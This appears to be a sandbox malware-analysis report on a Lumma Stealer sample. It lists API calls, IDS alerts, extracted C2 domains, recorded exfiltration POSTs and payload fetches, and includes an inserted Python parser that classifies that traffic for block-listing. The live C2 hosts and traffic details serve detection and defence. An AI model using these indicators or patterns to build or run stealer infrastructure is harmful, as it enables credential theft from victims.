Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com, Code function: 12_2_00E1A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00E1A087
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com, Code function: 12_2_00E1A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00E1A1E2
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com, Code function: 12_2_00E0E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_00E0E472
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com, Code function: 12_2_00E1A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_00E1A570
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com, Code function: 12_2_00E166DC FindFirstFileW,FindNextFileW,FindClose,12_2_00E166DC
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com, Code function: 12_2_00DDC622 FindFirstFileExW,12_2_00DDC622
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com, Code function: 12_2_00E173D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_00E173D4
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com, Code function: 12_2_00E17333 FindFirstFileW,FindClose,12_2_00E17333
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com, Code function: 12_2_00E0D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00E0D921
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\124531\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\124531Jump to behavior

                Networking

                Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49766 -> 172.67.186.189:443
                Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49766 -> 172.67.186.189:443
                Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49775 -> 172.67.186.189:443
                Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49760 -> 172.67.186.189:443
                Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49760 -> 172.67.186.189:443
                Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49805 -> 172.67.186.189:443
                Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49816 -> 172.67.186.189:443
                Source: Malware configuration extractor | URLs: energyaffai.lat
                Source: Malware configuration extractor | URLs: necklacebudi.lat
                Source: Malware configuration extractor | URLs: quantitypitt.click
                Source: Malware configuration extractor | URLs: grannyejh.lat
                Source: Malware configuration extractor | URLs: rapeflowwj.lat
                Source: Malware configuration extractor | URLs: sustainskelet.lat
                Source: Malware configuration extractor | URLs: crosshuaht.lat
                Source: Malware configuration extractor | URLs: discokeyus.lat
                Source: Malware configuration extractor | URLs: aspecteirs.lat
                Source: Joe Sandbox View | IP Address: 194.58.112.174
                Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49766 -> 172.67.186.189:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49782 -> 172.67.186.189:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49788 -> 172.67.186.189:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49760 -> 172.67.186.189:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49805 -> 172.67.186.189:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49794 -> 172.67.186.189:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49775 -> 172.67.186.189:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49816 -> 172.67.186.189:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49823 -> 194.58.112.174:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49846 -> 172.67.191.144:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49799 -> 172.67.186.189:443
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: quantitypitt.click
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 78; Host: quantitypitt.click
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=84ORA7LFCGFL3S; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 12810; Host: quantitypitt.click
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=LU8PHT2JI4GEGC; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 15052; Host: quantitypitt.click
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=5KF09NDH3SOHE; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 20536; Host: quantitypitt.click
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=I8UMLDHAE16NIWXO8; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 3805; Host: quantitypitt.click
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=FRIS9LZKT7T94LOZIN4; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 1253; Host: quantitypitt.click
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=FGTA4F6GQKZXW; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 557508; Host: quantitypitt.click
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 113; Host: quantitypitt.click
                Source: global traffic | HTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1; Connection: Keep-Alive; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Host: kliptizq.shop
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E1D889 InternetReadFile,SetEvent,GetLastError,SetEvent
                Source: global traffic | HTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1; Connection: Keep-Alive; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Host: kliptizq.shop
                Source: global traffic | DNS traffic detected: DNS query: qebHBVmGmKNLRBMHyOJv.qebHBVmGmKNLRBMHyOJv
                Source: global traffic | DNS traffic detected: DNS query: quantitypitt.click
                Source: global traffic | DNS traffic detected: DNS query: neqi.shop
                Source: global traffic | DNS traffic detected: DNS query: kliptizq.shop
                Source: unknown | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: quantitypitt.click
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden; Date: Sun, 22 Dec 2024 22:29:17 GMT; Content-Type: text/html; charset=UTF-8; Transfer-Encoding: chunked; Connection: close; X-Frame-Options: SAMEORIGIN; Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SgdMo%2FlmiMzguYF8JZyhNWcTi89c88o1%2Bxx3atAqJuRbSNIAUJ3foY4pQ7w8AnjSO7rsN4Tps3gOs3BUEyHqAQQ7z6Ss0U8XRvTOlGWW%2B3PRN98EcFEj73DLNHJJMpRX"}],"group":"cf-nel","max_age":604800}; NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}; Server: cloudflare; CF-RAY: 8f638cc2ab095e5f-EWR
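                The HTTP rows above record the sample's traffic as header blobs flattened onto one line by the report export. The Python below is an added example and is not part of the Joe Sandbox report: it re-splits those blobs into parsed requests, assigns each one a stage, and totals the bytes uploaded in multipart posts per host, then checks which contacted hosts appear in the extracted configuration. The request strings are constructed from the rows above; the stage names, the rule that a tiny urlencoded POST /api is the initial check-in while multipart/form-data POSTs carry collected data, and the 16-byte threshold are assumptions made here, not something the report states.

```python
"""Parse and classify the HTTP requests recorded in the sandbox report.

Added example; not part of the Joe Sandbox report. The request strings below
are constructed from the report's "HTTP traffic detected" rows, where the
export flattened every header onto one line. Stage names and the 16-byte
check-in threshold are assumptions made here, not facts from the report.
"""
import re
from dataclasses import dataclass, field

# Header names present in the recorded requests; the zero-width lookahead
# re-splits the flattened blob at the start of each header.
_HEADER_NAMES = ("Connection", "Content-Type", "User-Agent", "Content-Length", "Host")
_HEADER_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(map(re.escape, _HEADER_NAMES)))

# C2 domains listed by the report's malware configuration extractor.
CONFIG_C2_DOMAINS = frozenset({
    "energyaffai.lat", "necklacebudi.lat", "quantitypitt.click",
    "grannyejh.lat", "rapeflowwj.lat", "sustainskelet.lat",
    "crosshuaht.lat", "discokeyus.lat", "aspecteirs.lat",
})

# User-Agent seen on every recorded request.
UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict = field(default_factory=dict)

    @property
    def host(self) -> str:
        return self.headers.get("Host", "").lower()

    @property
    def content_length(self) -> int:
        return int(self.headers.get("Content-Length", "0"))


def parse_flattened_request(blob: str) -> HttpRequest:
    """Turn 'POST /api HTTP/1.1Connection: Keep-AliveContent-Type: ...' into a request."""
    request_line, _, header_blob = blob.partition(" HTTP/1.1")
    method, path = request_line.split(" ", 1)
    headers = {}
    for part in _HEADER_SPLIT.split(header_blob):
        if part:                                  # leading split yields ''
            name, _, value = part.partition(": ")
            headers[name] = value
    return HttpRequest(method, path, headers)


def classify(req: HttpRequest) -> str:
    """Assign a traffic stage using the assumed heuristics from the docstring."""
    ctype = req.headers.get("Content-Type", "")
    if req.method == "POST" and req.path == "/api":
        if ctype.startswith("multipart/form-data"):
            return "exfiltration"                 # collected data sent as form parts
        if ctype == "application/x-www-form-urlencoded":
            # the first recorded POST carries an 8-byte body: treated as the beacon
            return "checkin" if req.content_length <= 16 else "command-exchange"
    if req.method == "GET" and req.path.endswith(".txt"):
        return "payload-fetch"                    # follow-on text blob from a second host
    return "unclassified"


def summarize(blobs):
    """Return (rows, multipart bytes uploaded per host, hosts present in the config)."""
    rows, uploaded = [], {}
    for blob in blobs:
        req = parse_flattened_request(blob)
        stage = classify(req)
        rows.append((req.host, req.method, req.path, stage, req.content_length))
        if stage == "exfiltration":
            uploaded[req.host] = uploaded.get(req.host, 0) + req.content_length
    matched = {host for host, *_ in rows if host in CONFIG_C2_DOMAINS}
    return rows, uploaded, matched


def _post(ctype: str, length: int, host: str = "quantitypitt.click") -> str:
    """Rebuild a flattened POST /api row in the shape the report exported it."""
    return (f"POST /api HTTP/1.1Connection: Keep-AliveContent-Type: {ctype}"
            f"User-Agent: {UA}Content-Length: {length}Host: {host}")


# Constructed from the report's recorded requests, in the order listed.
REPORTED_REQUESTS = [
    _post("application/x-www-form-urlencoded", 8),
    _post("application/x-www-form-urlencoded", 78),
    _post("multipart/form-data; boundary=84ORA7LFCGFL3S", 12810),
    _post("multipart/form-data; boundary=LU8PHT2JI4GEGC", 15052),
    _post("multipart/form-data; boundary=5KF09NDH3SOHE", 20536),
    _post("multipart/form-data; boundary=I8UMLDHAE16NIWXO8", 3805),
    _post("multipart/form-data; boundary=FRIS9LZKT7T94LOZIN4", 1253),
    _post("multipart/form-data; boundary=FGTA4F6GQKZXW", 557508),
    _post("application/x-www-form-urlencoded", 113),
    f"GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: {UA}Host: kliptizq.shop",
]

if __name__ == "__main__":
    rows, uploaded, matched = summarize(REPORTED_REQUESTS)
    for host, method, path, stage, length in rows:
        print(f"{host:22} {method:4} {path:24} {stage:17} {length:>7}")
    print("multipart bytes per host:", uploaded)
    print("hosts present in extracted config:", sorted(matched))
```

                Run stand-alone, the script lists the ten recorded requests with their assumed stage and reports roughly 610 KB of multipart uploads to quantitypitt.click, the only contacted host that also appears in the extracted configuration; kliptizq.shop and neqi.shop are fetched but are not in that list, which is the kind of gap worth noting when turning the config domains into block-list entries.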
                Source: Setup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Setup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: Setup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: Setup.exe | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Setup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Setup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: Setup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Setup.exe | String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
                Source: Setup.exe | String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Setup.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                Source: Setup.exe | String found in binary or memory: http://ocsp.digicert.com0A
                Source: Setup.exe | String found in binary or memory: http://ocsp.digicert.com0C
                Source: Setup.exe | String found in binary or memory: http://ocsp.digicert.com0X
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: Setup.exe | String found in binary or memory: http://ocsps.ssl.com0
                Source: powershell.exe, 00000010.00000002.2797712554.00000000047C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000000.2130438108.0000000000E75000.00000002.00000001.01000000.00000006.sdmp, Designing.com.2.dr, Brunette.9.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: Setup.exe | String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000010.00000002.2797712554.00000000047C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://kliptizq.shop/9
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://kliptizq.shop/Z
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txt
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txtC
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txtM
                Source: Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kliptizq.shop:443/int_clp_ldr_sha.txtge
                Source: Designing.com, 0000000C.00000003.2788056081.000000000415E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://neqi.shop/
                Source: Designing.com, 0000000C.00000003.2788056081.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000002.2789843944.0000000001807000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://neqi.shop/sdgjyut/psh.txt
                Source: Designing.com, 0000000C.00000003.2788056081.000000000415E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://neqi.shop/sdgjyut/psh.txtk
                Source: Designing.com, 0000000C.00000003.2535367064.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2558937419.00000000041DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://quantitypitt.click/
                Source: Designing.com, 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://quantitypitt.click/%
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://quantitypitt.click/api
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://quantitypitt.click/apik
                Source: Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://quantitypitt.click:443/api
                Source: Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://quantitypitt.click:443/apiK
                Source: Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://quantitypitt.click:443/apiicrosoft
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: powershell.exe, 00000010.00000002.2797712554.0000000004B01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                Source: powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landinghZ
                Source: powershell.exe, 00000010.00000002.2796253872.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.000000000094B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796883993.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blank
                Source: powershell.exe, 00000010.00000002.2796376802.0000000000980000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landingmance
                Source: powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phish
                Source: powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishhZ
